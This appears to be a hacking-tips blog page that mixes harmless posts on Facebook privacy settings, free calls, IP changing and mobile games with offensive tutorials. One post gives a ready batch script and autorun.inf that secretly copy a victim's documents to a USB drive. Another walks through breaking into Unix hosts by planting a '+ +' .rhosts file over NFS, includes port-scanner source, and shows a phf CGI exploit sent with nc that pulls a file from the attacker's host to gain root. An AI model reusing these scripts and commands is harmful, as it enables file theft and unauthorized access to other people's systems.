Facebook
RSS

Reveal *****(Asterisk) Passwords Using Javascript


Want to Reveal the Passwords Hidden Behind Asterisk (****) ?

Follow the steps given below-

1) Open the Login Page of any website. (eg. http://mail.yahoo.com) 

2) Type your 'Username' and 'Password'.

3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.

javascript: alert(document.getElementById('Passwd').value);

4) As soon as you press 'Enter', A window pops up showing Password typed by you..!


Note :- This trick may not be working with firefox. 
[ Read More ]

How to Steal people files using usb drive


I am going to teach you how you can do this from batch file with the help of autorun.inf file.
Let me tell you the basic things what will happen.

When you plug in in your Pen drive, system will look up for autorun.inf (incase if autorun is not disabled for your drive from the system).

Then we’ll input some command in autorun.inf in such a way that it will load the batch file that does the magic of copying all the files from your PC. In this demonstration I am copying only the files and folders in My Documents.

Here goes the batch code:

@echo off
:CHECK
if not exist "%homedrive%\Copied_files" md "%homedrive%\Copied_files"
if exist "%systemdrive%\Documents and Settings" goto COPIER
goto ERROR

:COPIER
if not exist "%homedrive%\Copied_files\%computername%" md "%homedrive%\Copied_files\%computername%"
if not exist "%homedrive%\Copied_files\%computername%\VIDEOS" md "%homedrive%\Copied_files\%computername%\VIDEOS"
if not exist "%homedrive%\Copied_files\%computername%\PICTURES" md "%homedrive%\Copied_files\%computername%\PICTURES"
if not exist "%homedrive%\Copied_files\%computername%\MUSIC" md "%homedrive%\Copied_files\%computername%\MUSIC"
if not exist "%homedrive%\Copied_files\%computername%\DOWNLOADS" md "%homedrive%\Copied_files\%computername%\DOWNLOADS"
copy /y "%userprofile%\My Documents\*.*" "%homedrive%\Copied_files\%computername%"
copy /y "%userprofile%\My Documents\My Videos" "%homedrive%\Copied_files\%computername%\VIDEOS"
copy /y "%userprofile%\My Documents\My Music" "%homedrive%\Copied_files\%computername%\MUSIC"
copy /y "%userprofile%\My Documents\My Pictures" "%homedrive%\Copied_files\%computername%\PICTURES"
copy /y "%userprofile%\My Documents\Downloads" "%homedrive%\Copied_files\%computername%\DOWNLOADS"
MSG %username% "DONE!"
exit

:ERROR
exit

What it actually does is in first case ,CHECK it checks if your removable storage have Copied_files folder or not. If it doesn’t have then it creates one by using MD (Make Directory) command.

Again it checks if you have documents and settings folder then it will assume that you are using windows XP. Other wise it will return an error and exits.

This happens because; in Windows XP the user’s documents are usually stored in %systemroot%\Documents and Settings folder.

Now I’ve defined another two cases after the first case CHECK, that is COPIER case and ERROR case.

Case COPIER will execute when the program recognizes it is Windows XP, where the real coying work goes o.

Case ERROR will execute when the Documents and Settings doesn’t exists in your system root.

This is just a simple use of Batch programming. Copy the above code and paste it in notepad and save it as Filename.bat.

Now let’s create a file that will load it automatically.

[autorun]
Open=Filename.bat
Action=File Copier

he above code goes in autorun.inf file. Open notepad and copy it and paste it and save as autorun.inf.

Copy the two files, autorun.inf and Filename.bat in your flash drive.

Then plug in your device to your friends PC and do the evil things.

Where is the flaw?

It shows Command prompt window and process of copying (thank god your noob never think that it actually copying).

Another thing is that it determines the windows by searching the file users and Docuemnts and settings, which is not the right way to determine your system operating system.

However this is just an educational tutorial.

Hope this tutorial was helpful.
[ Read More ]

Huge Correction re. Facebook Wall Privacy


I'm really annoyed about having to write this post because I believe the wrong info I posted is mainly the fault of Facebook's Bad Interface Design. And the worst part is that, because it's related to protecting your privacy, it could have serious consequences for some people.

In two earlier posts, Privacy Controls in Facebook Pt. 1 and Reader Question: Restricting Access to Wall Posts, I described how you can customize your Privacy Settings to specify which of your friends can/can't see what's on your Wall (on your Profile page). And I showed the section on your Profile Privacy Settings page where you can edit these settings—not surprisingly called Wall Posts.
But then yesterday, when a reader wrote me with a specific question related to privacy settings, I was doing some testing and discovered something surprising. I restricted one of my friends from seeing my Wall Posts and then typed her name in the box for "See how a friend sees your profile" and it still showed my Wall Posts. I asked my friend to confirm if she could see things on my Wall (in case the problem was with the "See how..." feature) and she said she could.
At that point, I thought I had discovered a major bug and did a Google search to see if anyone else had reported it and couldn't find anything. Hmmm...
Well, it turns out that the Wall Posts section doesn't apply to posts you put on your Wall—only to ones that your friends have posted. I confirmed with my friend that she couldn't see any posts from my other friends. (But she could still see comments from my other friends on any of my status lines, links, etc. that appeared on my Wall.)
I won't go into the whole story of how I found out this is the way it's supposed to work but I will say that Facebook does actually tell you this... IF you click on the little question mark next to the Wall Posts heading.
Now call me crazy, but I think if I say I'm restricting someone from seeing my Wall Posts, I'm expecting they're restricted from seeing ALL my Wall Posts, including mine.
So how DO you stop people from seeing your Wall Posts as well? Well, you'll have to do that in a few places. If you don't want them to see your status lines or links you post to other sites, then you need to use the Status and Links dropdown box on the same Profile Privacy Settings page.
Note: If you do customize settings on this page, make sure you click the Save Changes button at the bottom of the page to make them take effect.
If you don't want them to see your Photos or Notes or info from any other applications you're using, you'll have to change those settings for each one from the Application Settings page (get there from the Settings dropdown menu at the top of the page). For example, here is the Settings box for my Scrabble application, where I can restrict certain people from seeing anything I've done with that game.
You can also prevent having any stories from the application from being posted to your Wall in the first place, from the Additional Permissions tab.
If any of this isn't clear, please let me know. I'll be updating the earlier posts as well to clarify how this works. I apologize for any confusion or inconvenience they may have caused you.
[ Read More ]

MAKE A CALL FROM PC TO MOBILE FREE


Make Free Calls from Computer to Mobile phone
You can now make free calls from your pc to any mobile in the world. All you need is a mic with ear phones, a decent internet connection and Yahoo Messenger or Skype Installed.I’m now using this free call method and the great thing is that, this trick can be used to make unlimited call to mobiles all over the world and not limited to United states. It even works to make free local mobile calls in India.
So how do we make a call from pc to mobile phone for free?
Install Yahoo messenger or Skype. In case you don’t have it Google it and download the latest version.
Sign into your yahoo messenger or Skype using your yahoo id and password. Configure your microphone and headset if you have installed a fresh yahoo or skype software
Inside your Yahoo messenger dial                    and press enter(as shown in figure).
Make Free Call from computer to mobile using Yahoo messenger or Skype
Now a small window pops up like the one shown below.
Free Call from Computer To mobile using Yahoo Messenger
An operator greets you with a recorded welcome message along with an advertisement and asks you to select one of the Free411 service. Just hear the services options until they say the last one as “Free Call”. When you hear this, don’t press any number on your keyboard and instead SAY “Free call” loudly on your microphone connected to your PC.
After this voice message is detected by their system, they will run a short advertisement of their sponsor and make sure you don’t press any number at this time.
WAIT UNTIL YOU HEAR A BEEP SOUND after the following message “Please dial the phone number country code first, don’t forget to dial 1 for north America”
After you hear this message ,immediately dial the destination number of your choice along with the country code.(e.g. for north America it’s 1 and for India it’s 91)
Your call will get connected and you can talk for 7 minutes continuous for free. When it gets disconnected, repeat the same procedure again. You can make multiple and unlimited calls with this service.
It was never easy to make a free international call like this before.
So what’s the catch?
FREE411 service toll-free number is based in USA. This company gets paid for the advertisements from sponsors.
Are there any limits on the number of call which we can make?
No. There is no limit on the number of free calls which can be made through this system.
So enjoy this trick to make free international and local calls and make sure you don’t abuse the system.
[ Read More ]

GETTING ACCESS


Getting access.

_______



Well folks, there are several methods to get access to a site.

I'll try to explain the most used ones.

The first thing I do is see if the system has an export list:



mysite:~>/usr/sbin/showmount -e Slave.site.com

RPC: Program not registered.



If it gives a message like this one, then it's time to search another way

in.

What I was trying to do was to exploit an old security problem by most

SUN OS's that could allow an remote attacker to add a .rhosts to a users

home directory... (That was possible if the site had mounted their home

directory.

Let's see what happens...





mysite:~>/usr/sbin/showmount -e victim1.site.com

/usr victim2.site.com

/home (everyone)

/cdrom (everyone)

mysite:~>mkdir /tmp/mount

mysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/

mysite:~>ls -sal /tmp/mount

total 9

1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./

1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../

1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/

1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/

1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/

1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/

1 -rw------- 1 root root 242 Mar 9 1997 sudoers

1 drwx------ 3 test 100 1024 Oct 8 21:05 test/

1 drwx------ 15 102 100 1024 Oct 20 18:57 rapper/



Well, we wanna hack into rapper's home.

mysite:~>id

uid=0 euid=0

mysite:~>whoami

root

mysite:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd



We use /bin/csh 'cuz bash leaves a (Damn!) .bash_history and you might

forget it on the remote server...



mysite:~>su - rapper

Welcome to rapper's user.

mysite:~>ls -lsa /tmp/mount/

total 9

1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./

1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../

1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/

1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/

1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/

1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/

1 -rw------- 1 root root 242 Mar 9 1997 sudoers

1 drwx------ 3 test 100 1024 Oct 8 21:05 test/

1 drwx------ 15 rapper daemon 1024 Oct 20 18:57 rapper/



So we own this guy's home directory...



mysite:~>echo "+ +" > rapper/.rhosts

mysite:~>cd /

mysite:~>rlogin victim1.site.com

Welcome to Slave.Site.Com.

SunOs ver....(crap).

victim1:~$



This is the first method...

Another method could be to see if the site has an open 80 port. That would

mean that the site has a web page.

(And that's very bad, 'cuz it usually it's vulnerable).

Below I include the source of a scanner that helped me when NMAP wasn't written.

(Go get it at http://www.dhp.com/~fyodor. Good job, Fyodor).

NMAP is a scanner that does even stealth scanning, so lots of systems won't

record it.



/* -*-C-*- tcpprobe.c */

/* tcpprobe - report on which tcp ports accept connections */

/* IO ERROR, error@axs.net, Sep 15, 1995 */



#include <stdio.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <errno.h>

#include <netdb.h>

#include <signal.h>



int main(int argc, char **argv)

{

int probeport = 0;

struct hostent *host;

int err, i, net;

struct sockaddr_in sa;



if (argc != 2) {

printf("Usage: %s hostname\n", argv[0]);

exit(1);

}



for (i = 1; i < 1024; i++) {

strncpy((char *)&sa, "", sizeof sa);

sa.sin_family = AF_INET;

if (isdigit(*argv[1]))

sa.sin_addr.s_addr = inet_addr(argv[1]);

else if ((host = gethostbyname(argv[1])) != 0)

strncpy((char *)&sa.sin_addr, (char *)host->h_addr, sizeof sa.sin_addr);

else {

herror(argv[1]);

exit(2);

}

sa.sin_port = htons(i);

net = socket(AF_INET, SOCK_STREAM, 0);

if (net < 0) {

perror("\nsocket");

exit(2);

}

err = connect(net, (struct sockaddr *) &sa, sizeof sa);

if (err < 0) {

printf("%s %-5d %s\r", argv[1], i, strerror(errno));

fflush(stdout);

} else {

printf("%s %-5d accepted. \n", argv[1], i);

if (shutdown(net, 2) < 0) {

perror("\nshutdown");

exit(2);

}

}

close(net);

}

printf(" \r");

fflush(stdout);

return (0);

}



Well, now be very carefull with the below exploits, because they usually get

logged.

Besides, if you really wanna get a source file from /cgi-bin/ use this

sintax : lynx http://www.victim1.com//cgi-bin/finger

If you don't wanna do that, then do a :



mysite:~>echo "+ +" > /tmp/rhosts



mysite:~>echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+

/root/.rhosts" | nc -v - 20 victim1.site.com 80



then

mysite:~>rlogin -l root victim1.site.com

Welcome to Victim1.Site.Com.

victim1:~#



Or, maybe, just try to find out usernames and passwords...

The usual users are "test", "guest", and maybe the owner of the site...

I usually don't do such things, but you can...



Or if the site is really old, use that (quote site exec) old bug for

wu.ftpd.

There are a lot of other exploits, like the remote exploits (innd, imap2,

pop3, etc...) that you can find at rootshell.connectnet.com or at

dhp.com/~fyodor.



Enough about this topic. (besides, if you can finger the site, you can

figgure out usernames and maybe by guessing passwords (sigh!) you could get

access to the site).
[ Read More ]

Facebook : Insert bold and underlined text in Facebook chat


Facebook chat is a place for many of them to chat with your friends and to be able to express your words properly. So here is the method how you include bold text or even underlined text in Facebook Chat.
The controls for the bold and underline in facebook chat follows similar controls as in Gtalk.
Insert Bold text in Facebook Chat
*Bold letters to be inserted in Facebook Chat* (Shift+F8)

Insert underlined text in Facebook chat
_Text to be underlined _ (Shift+ Minus)
So those were the simple tips on how to insert bold and underlined text in facebook chat.
[ Read More ]

Change IP address instantly for free While Browsing


You may need to change your IP address while surfing the internet for anonymity from search engines storing your data or to access any specific location based service.  Of course you have a lot of tools offering these features like this, as the most popular anonymizer tool  tor.But the problem with that is it takes too much time to start up or it needs to be installed first to use it. But here is a free online tools that lets you change your IP address on the fly..


Here is a screenshot of the website, shows the multiple IP addresses to choose from and some may be free while others require to be purchased.
On clicking on any one of the IP addresses , it will take you to the next screen where it will display a sub address bar to your browser, which when you enter the url will redirect your request to the new IP address.
So there you go, an easy and a quick way to change your IP address on the go, without the hassle of installing any software.Try New IP Now and change your IP address instantly.
[ Read More ]

5 Best Websites to Download Free Mobile Games


With the increase in gadgets and technology, games have become more important pass time for an average user, even  if he is not a hard core gamer.This is the reason why the most popular apps for iPhone , Android or any other mobile  devices,the demand for  gaming applications comes on top by a far margin. So here are the top 5  websites that provide you with free games for download for you to kill your boredom and have some fun in your free time.

1. Zedge










Offers free downloads of free games and more.Rated among the best in this category and a easier interface.Provides free downloads for mobile phones with themes , ringtones , games and more.

Mobile 9 is the second best website to download free mobile games .You can also  upload your own games for free and share them.Some of the best games are available for download for free.

Another great and popular website that allows you to play free games and download them onto your mobile phone for free.Zapak is widely popular due to their campaign and also offers a good interface.

Mobile24 is another great site to play free games and download the game onto your mobile.Lets you download and also upload the game as well to share with the world.

5.Mauj
Mauj is one of the popular mobile game download website in india. Offers free games for download for mobile phones and also in java application format. Focused mainly towards indian market , includes popular games like cricket and more.
So there you have it, the 5 best sites to download free mobile games or even upload the games in some.If you want to share more websites of this category, let us know by your comments.

[ Read More ]